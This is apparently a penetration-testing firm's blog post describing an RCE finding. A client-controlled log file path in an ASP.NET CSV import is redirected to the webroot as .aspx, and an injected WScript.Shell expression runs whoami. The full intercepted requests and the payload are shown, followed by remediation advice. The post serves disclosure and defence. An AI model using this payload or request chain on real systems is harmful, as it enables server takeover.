Welcome to our Pentest Files series. Each post presents a real, interesting, or dangerous finding one of our testers identified during an actual engagement, so you can see the kinds of things our pentesters get up to and take steps to prevent similar vulnerabilities in your own assets. Findings are taken from real reports and anonymised to protect client confidentiality.
The Finding
During a recent web application penetration test, our tester Craig Fairman uncovered a particularly creative Remote Code Execution (RCE) vulnerability. What made this one stand out wasn’t just the severity; it was the ingenuity of the technique: abusing a CSV import feature to inject malicious code into a server-generated file, then manipulating the application into writing that file as an executable script in the webroot.
Vulnerability type: Remote Code Execution (RCE) via Log File Injection
Severity: Critical
Discovered by: Craig Fairman, OnSecurity
The Setup: How It Started
Craig was testing an ASP.NET web application with an administrative bulk import feature. The workflow was straightforward: upload a CSV, preview the data, then click a button to confirm the import. As part of this process, the application wrote a summary log file to disk, recording what was imported, when, and by whom.
Log files are often dismissed as low-risk, they’re just text files recording what happened, right?
Wrong.
Craig noticed something interesting in the preview step. When the application returned the confirmation page, the HTML contained a button with a data attribute holding the full server-side file path for the log that would be created during processing:
<button class="btn btn-primary"
data-action="confirmimport"
data-output="d:\\\\inetpub\\\\app\\\\logs\\\\bulk_import_20251112.txt"
data-url="/admin/Records/ProcessBulkImport">
Confirm Import
</button>
When the user clicked this button, client-side JavaScript extracted this path and sent it back to the server as a POST parameter. The server trusted it completely, meaning the log file’s destination was controlled client-side.
The Exploit: A Four-Step Chain
Step 1: Upload a normal CSV and observe the flow
Craig uploaded a legitimate CSV to understand the import process and see how data flowed through the application.
ID,Description,StartDate,EndDate,Category
101,Quarterly Review,15/11/2025,16/11/2025,Internal
Step 2: Intercept the confirmation request and change the output path
When clicking the confirmation button, Craig intercepted the resulting HTTP request in Burp Suite. It included a parameter containing the file path the application had embedded in the preview HTML. Craig modified two things:
- The directory — from the application’s logs folder to its webroot.
- The file extension — from
.txtto.aspx.
POST /admin/Records/ProcessBulkImport HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded
output_file=d:\\\\inetpub\\\\app\\\\wwwroot\\\\a8c3e9f1-4d72-41b0-b6a5-9f0e2d7c8b13.aspx
&record_set=[{"ID":"101","Description":"Quarterly Review","StartDate":"15/11/2025"...}]
The import processed normally, but instead of writing a .txt log to the logs folder, the application wrote the file into the webroot with an .aspx extension. Browsing to the file confirmed that field values from the CSV (such as Description) were echoed directly into the output.
Step 3: Replay the request with a payload in the CSV data
Now Craig knew user-supplied field values were written unsanitized into the output file. He replayed the request, this time embedding an ASP code expression in the Description field:
POST /admin/Records/ProcessBulkImport HTTP/2
Host: app.example.com
Content-Type: application/x-www-form-urlencoded
output_file=d:\\\\inetpub\\\\app\\\\wwwroot\\\\a8c3e9f1-4d72-41b0-b6a5-9f0e2d7c8b13.aspx
&record_set=[{"ID":"101","Description":"<%=CreateObject(\\\\"WScript.Shell\\\\").Exec(\\\\"whoami\\\\").StdOut.ReadAll()%>","StartDate":"15/11/2025"...}]
This classic ASP expression creates a WScript.Shell COM object, runs the Windows whoami command, and writes the output into the HTTP response. The application wrote this payload verbatim into the .aspx file — no sanitisation, no encoding.
Step 4 — Request the file and trigger execution
A simple GET request to the newly created file was all it took:
GET /a8c3e9f1-4d72-41b0-b6a5-9f0e2d7c8b13.aspx HTTP/2
Host: app.example.com
iis apppool\\\\defaultapppool
Remote code execution, achieved by turning a routine bulk import feature into a means of executing arbitrary commands on the server.
Why This Worked
Three things had to be true for this exploit to succeed, and all three were:
- The output file path was client-controlled. The server embedded a full file path in the preview HTML and trusted the client to return it unmodified. An attacker could change both the directory and the extension.
- CSV field values were written to the file unsanitised. The application echoed user-supplied data directly into the output without encoding or stripping dangerous characters.
- The webroot was writable and served dynamic content. Because the application could be instructed to write an
.aspxfile into a web-accessible directory, IIS would parse and execute it on request.
No single issue alone would have been critical. Unsanitized data written to a .txt log in a restricted directory is low risk. A controllable file path writing only safe content is concerning, but not devastating. Chained together, they give an attacker full control of the server.
Why This Is Dangerous
RCE is about as bad as it gets. From this foothold, an attacker could:
- Move laterally across internal systems
- Exfiltrate sensitive data, including customer records, credentials, or intellectual property
- Establish persistence, planting backdoors for long-term access
- Escalate privileges toward admin or root access
- Deploy ransomware or cause operational disruption
What makes this particular variant especially dangerous is how it abuses trusted application functionality. The import feature is working as designed, it’s just being pointed somewhere it shouldn’t be. There are no malicious file uploads, no exploit kits, no suspicious binaries. The application itself writes the file, making it far harder to detect through conventional monitoring.
The Remediation
The good news is that this class of vulnerability is preventable. The client was provided with clear remediation guidance and, using OnSecurity’s platform, was able to validate the fixes were effective through a free retest.
To prevent log injection leading to RCE:
Never trust client-supplied file paths. File destinations should be constructed entirely server-side. If a filename must be derived from user input, strip it down to alphanumeric characters, and enforce a safe extension like .txt, and write to a fixed directory. Ensure the resulting path cannot escape the intended directory via traversal sequences.
Sanitise all user input before writing to disk. Never write raw user-supplied strings to files. Strip or encode characters that could be interpreted as code (e.g. <?, <%, script tags). Note that sanitisation alone is not sufficient here; even perfectly sanitised content is dangerous if the file path and extension are attacker-controlled.
Never store log files in web-accessible directories. Log files should live outside the web root entirely. Even if code is injected, the web server should never be able to serve the file directly.
Restrict write permissions on web-accessible directories. The web server process should not be able to write files into directories that serve dynamic content. Even if an attacker can control a file path, the write should fail if the webroot isn’t writable.
Use a centralised logging service. Ship logs to a dedicated log aggregation platform (e.g. ELK, Splunk, AWS CloudWatch) rather than writing them to local files on the server. This removes the attack surface entirely.
Implement file extension controls. Configure your web server to only execute files with expected extensions in expected directories, and explicitly deny execution of log directories.
What This Looks Like in the Real World
This kind of vulnerability is more common than you’d think. Applications evolve rapidly, import features get bolted on, and developer teams don’t always think about the security implications of where and how server-generated files are stored. A harmless log path becomes a serious problem the moment it can be redirected to the webroot with an executable extension.
This finding was discovered during a structured, time-boxed penetration test. Without that test, this critical vulnerability could have remained undetected indefinitely, quietly waiting to be found by someone with far less benign intentions.
Craig identified and reported this finding in real time through OnSecurity’s platform, meaning the client’s team was able to see the issue, understand its impact, and begin remediation work while the test was still in progress — not weeks later when a PDF arrived in their inbox.
How to Protect Yourself
If your application writes any data to files on disk, it’s worth asking:
- Could anyone, internal or external, influence the path, filename, or extension of those files?
- Is user input sanitised before it’s written to disk?
- Are output files stored outside of web-accessible directories?
If you’re not certain of the answers, a penetration test is the most reliable way to find out before an attacker does.
Want to know if your application is vulnerable? Get a quote from OnSecurity. Benefit from real-time reporting so that you can remediate findings as soon as they are discovered.


